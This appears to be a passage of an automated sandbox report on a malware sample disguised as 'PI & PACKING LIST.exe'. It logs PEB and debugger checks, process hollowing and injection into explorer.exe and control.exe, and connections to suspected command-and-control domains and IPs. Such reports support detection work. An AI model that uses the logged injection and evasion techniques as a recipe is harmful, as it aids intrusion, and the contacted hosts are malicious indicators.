Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012E23E3 mov ecx, dword ptr fs:[00000030h] 2_2_012E23E3
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012E23E3 mov ecx, dword ptr fs:[00000030h] 2_2_012E23E3
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012E23E3 mov eax, dword ptr fs:[00000030h] 2_2_012E23E3
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B53CA mov eax, dword ptr fs:[00000030h] 2_2_012B53CA
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B53CA mov eax, dword ptr fs:[00000030h] 2_2_012B53CA
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01274A2C mov eax, dword ptr fs:[00000030h] 2_2_01274A2C
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01274A2C mov eax, dword ptr fs:[00000030h] 2_2_01274A2C
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A229 mov eax, dword ptr fs:[00000030h] 2_2_0125A229
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A229 mov eax, dword ptr fs:[00000030h] 2_2_0125A229
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A229 mov eax, dword ptr fs:[00000030h] 2_2_0125A229
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A229 mov eax, dword ptr fs:[00000030h] 2_2_0125A229
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A229 mov eax, dword ptr fs:[00000030h] 2_2_0125A229
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A229 mov eax, dword ptr fs:[00000030h] 2_2_0125A229
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A229 mov eax, dword ptr fs:[00000030h] 2_2_0125A229
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A229 mov eax, dword ptr fs:[00000030h] 2_2_0125A229
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A229 mov eax, dword ptr fs:[00000030h] 2_2_0125A229
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125B236 mov eax, dword ptr fs:[00000030h] 2_2_0125B236
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125B236 mov eax, dword ptr fs:[00000030h] 2_2_0125B236
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125B236 mov eax, dword ptr fs:[00000030h] 2_2_0125B236
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125B236 mov eax, dword ptr fs:[00000030h] 2_2_0125B236
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125B236 mov eax, dword ptr fs:[00000030h] 2_2_0125B236
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125B236 mov eax, dword ptr fs:[00000030h] 2_2_0125B236
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01248A0A mov eax, dword ptr fs:[00000030h] 2_2_01248A0A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01235210 mov eax, dword ptr fs:[00000030h] 2_2_01235210
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01235210 mov ecx, dword ptr fs:[00000030h] 2_2_01235210
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01235210 mov eax, dword ptr fs:[00000030h] 2_2_01235210
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01235210 mov eax, dword ptr fs:[00000030h] 2_2_01235210
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0123AA16 mov eax, dword ptr fs:[00000030h] 2_2_0123AA16
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0123AA16 mov eax, dword ptr fs:[00000030h] 2_2_0123AA16
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01253A1C mov eax, dword ptr fs:[00000030h] 2_2_01253A1C
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012FAA16 mov eax, dword ptr fs:[00000030h] 2_2_012FAA16
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012FAA16 mov eax, dword ptr fs:[00000030h] 2_2_012FAA16
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012EB260 mov eax, dword ptr fs:[00000030h] 2_2_012EB260
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012EB260 mov eax, dword ptr fs:[00000030h] 2_2_012EB260
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01308A62 mov eax, dword ptr fs:[00000030h] 2_2_01308A62
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0127927A mov eax, dword ptr fs:[00000030h] 2_2_0127927A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01239240 mov eax, dword ptr fs:[00000030h] 2_2_01239240
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01239240 mov eax, dword ptr fs:[00000030h] 2_2_01239240
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01239240 mov eax, dword ptr fs:[00000030h] 2_2_01239240
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01239240 mov eax, dword ptr fs:[00000030h] 2_2_01239240
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012FEA55 mov eax, dword ptr fs:[00000030h] 2_2_012FEA55
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012C4257 mov eax, dword ptr fs:[00000030h] 2_2_012C4257
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012352A5 mov eax, dword ptr fs:[00000030h] 2_2_012352A5
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012352A5 mov eax, dword ptr fs:[00000030h] 2_2_012352A5
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012352A5 mov eax, dword ptr fs:[00000030h] 2_2_012352A5
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012352A5 mov eax, dword ptr fs:[00000030h] 2_2_012352A5
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012352A5 mov eax, dword ptr fs:[00000030h] 2_2_012352A5
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0124AAB0 mov eax, dword ptr fs:[00000030h] 2_2_0124AAB0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0124AAB0 mov eax, dword ptr fs:[00000030h] 2_2_0124AAB0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126FAB0 mov eax, dword ptr fs:[00000030h] 2_2_0126FAB0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126D294 mov eax, dword ptr fs:[00000030h] 2_2_0126D294
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126D294 mov eax, dword ptr fs:[00000030h] 2_2_0126D294
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h] 2_2_012F4AEF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h] 2_2_012F4AEF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h] 2_2_012F4AEF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h] 2_2_012F4AEF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h] 2_2_012F4AEF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h] 2_2_012F4AEF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h] 2_2_012F4AEF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h] 2_2_012F4AEF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h] 2_2_012F4AEF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h] 2_2_012F4AEF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h] 2_2_012F4AEF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h] 2_2_012F4AEF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h] 2_2_012F4AEF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h] 2_2_012F4AEF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01262AE4 mov eax, dword ptr fs:[00000030h] 2_2_01262AE4
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01262ACB mov eax, dword ptr fs:[00000030h] 2_2_01262ACB
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126F527 mov eax, dword ptr fs:[00000030h] 2_2_0126F527
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126F527 mov eax, dword ptr fs:[00000030h] 2_2_0126F527
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126F527 mov eax, dword ptr fs:[00000030h] 2_2_0126F527
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01308D34 mov eax, dword ptr fs:[00000030h] 2_2_01308D34
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h] 2_2_01243D34
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h] 2_2_01243D34
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h] 2_2_01243D34
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h] 2_2_01243D34
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h] 2_2_01243D34
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h] 2_2_01243D34
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h] 2_2_01243D34
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h] 2_2_01243D34
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h] 2_2_01243D34
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h] 2_2_01243D34
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h] 2_2_01243D34
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h] 2_2_01243D34
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h] 2_2_01243D34
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0123AD30 mov eax, dword ptr fs:[00000030h] 2_2_0123AD30
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012FE539 mov eax, dword ptr fs:[00000030h] 2_2_012FE539
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012BA537 mov eax, dword ptr fs:[00000030h] 2_2_012BA537
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01264D3B mov eax, dword ptr fs:[00000030h] 2_2_01264D3B
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01264D3B mov eax, dword ptr fs:[00000030h] 2_2_01264D3B
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01264D3B mov eax, dword ptr fs:[00000030h] 2_2_01264D3B
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125C577 mov eax, dword ptr fs:[00000030h] 2_2_0125C577
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125C577 mov eax, dword ptr fs:[00000030h] 2_2_0125C577
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01273D43 mov eax, dword ptr fs:[00000030h] 2_2_01273D43
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B3540 mov eax, dword ptr fs:[00000030h] 2_2_012B3540
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012E3D40 mov eax, dword ptr fs:[00000030h] 2_2_012E3D40
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01257D50 mov eax, dword ptr fs:[00000030h] 2_2_01257D50
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012635A1 mov eax, dword ptr fs:[00000030h] 2_2_012635A1
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01261DB5 mov eax, dword ptr fs:[00000030h] 2_2_01261DB5
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01261DB5 mov eax, dword ptr fs:[00000030h] 2_2_01261DB5
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01261DB5 mov eax, dword ptr fs:[00000030h] 2_2_01261DB5
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_013005AC mov eax, dword ptr fs:[00000030h] 2_2_013005AC
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_013005AC mov eax, dword ptr fs:[00000030h] 2_2_013005AC
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01262581 mov eax, dword ptr fs:[00000030h] 2_2_01262581
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01262581 mov eax, dword ptr fs:[00000030h] 2_2_01262581
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01262581 mov eax, dword ptr fs:[00000030h] 2_2_01262581
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01262581 mov eax, dword ptr fs:[00000030h] 2_2_01262581
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01232D8A mov eax, dword ptr fs:[00000030h] 2_2_01232D8A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01232D8A mov eax, dword ptr fs:[00000030h] 2_2_01232D8A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01232D8A mov eax, dword ptr fs:[00000030h] 2_2_01232D8A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01232D8A mov eax, dword ptr fs:[00000030h] 2_2_01232D8A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01232D8A mov eax, dword ptr fs:[00000030h] 2_2_01232D8A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F2D82 mov eax, dword ptr fs:[00000030h] 2_2_012F2D82
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F2D82 mov eax, dword ptr fs:[00000030h] 2_2_012F2D82
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\control.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279910 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_01279910
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Network Connect: 35.78.89.117 80
Source: C:\Windows\explorer.exe Network Connect: 162.43.120.154 80
Source: C:\Windows\explorer.exe Network Connect: 142.250.203.115 80
Source: C:\Windows\explorer.exe Domain query: www.bengalindex.com
Source: C:\Windows\explorer.exe Domain query: www.nu2uresale.store
Source: C:\Windows\explorer.exe Network Connect: 209.99.64.33 80
Source: C:\Windows\explorer.exe Domain query: www.zkjk888.com
Source: C:\Windows\explorer.exe Network Connect: 178.128.239.245 80
Source: C:\Windows\explorer.exe Domain query: www.p-soils.com
Source: C:\Windows\explorer.exe Domain query: www.cpitherapy.com
Source: C:\Windows\explorer.exe Domain query: www.gebouwpas.online
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Section unmapped: C:\Windows\SysWOW64\control.exe base address: 1360000
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Memory written: C:\Users\user\Desktop\PI & PACKING LIST.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Thread register set: target process: 3452
Source: C:\Windows\SysWOW64\control.exe Thread register set: target process: 3452
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process created: C:\Users\user\Desktop\PI & PACKING LIST.exe C:\Users\user\Desktop\PI & PACKING LIST.exe
Source: explorer.exe, 00000003.00000000.307333028.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.332009342.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.264215848.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program ManagerT7<=ge
Source: explorer.exe, 00000003.00000000.336206655.0000000006770000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.340849752.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.321402743.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.307333028.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.332009342.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.264215848.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.331517747.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.263416995.0000000001378000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CProgmanile
Source: explorer.exe, 00000003.00000000.307333028.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.332009342.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.264215848.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Users\user\Desktop\PI & PACKING LIST.exe VolumeInformation
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
